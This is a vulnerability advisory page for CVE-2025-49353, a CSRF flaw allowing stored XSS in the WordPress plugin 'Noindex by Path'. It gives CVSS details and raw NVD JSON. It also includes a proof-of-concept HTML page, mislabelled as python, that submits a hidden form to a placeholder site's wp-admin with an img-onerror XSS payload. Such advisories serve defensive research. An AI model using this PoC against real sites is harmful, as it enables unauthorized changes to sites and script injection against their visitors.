Security Vulnerability Report
中文
CVE-2025-49353 CVSS 7.1 HIGH

CVE-2025-49353

Published: 2025-12-31 06:15:41
Last Modified: 2026-04-23 15:31:31

Description

Cross-Site Request Forgery (CSRF) vulnerability in Marcin Kijak Noindex by Path noindex-by-path allows Stored XSS.This issue affects Noindex by Path: from n/a through <= 1.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Noindex by Path插件 <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-49353 - Noindex by Path Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-49353</title> </head> <body> <h1>CVE-2025-49353 CSRF Attack PoC</h1> <p>Click the button below to trigger the Stored XSS payload injection.</p> <!-- Auto-submit form targeting WordPress admin interface --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php" method="POST" style="display:none;"> <!-- CSRF token would be missing in vulnerable version --> <input type="hidden" name="page" value="noindex-by-path-settings"> <input type="hidden" name="noindex_path" value="/test"><img src=x onerror='alert(String.fromCharCode(88,83,83,32,69,120,112,108,111,105,116,101,100))'>"> <input type="hidden" name="noindex_status" value="1"> <input type="hidden" name="submit" value="Save Changes"> </form> <button onclick="document.getElementById('csrfForm').submit();">Submit Request</button> <script> // Auto-submit after page load window.onload = function() { // Uncomment below line for automatic submission // document.getElementById('csrfForm').submit(); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49353", "sourceIdentifier": "[email protected]", "published": "2025-12-31T06:15:41.083", "lastModified": "2026-04-23T15:31:31.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Marcin Kijak Noindex by Path noindex-by-path allows Stored XSS.This issue affects Noindex by Path: from n/a through <= 1.0."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Marcin Kijak Noindex by Path permite XSS almacenado. Este problema afecta a Noindex by Path: desde n/d hasta 1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/noindex-by-path/vulnerability/wordpress-noindex-by-path-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}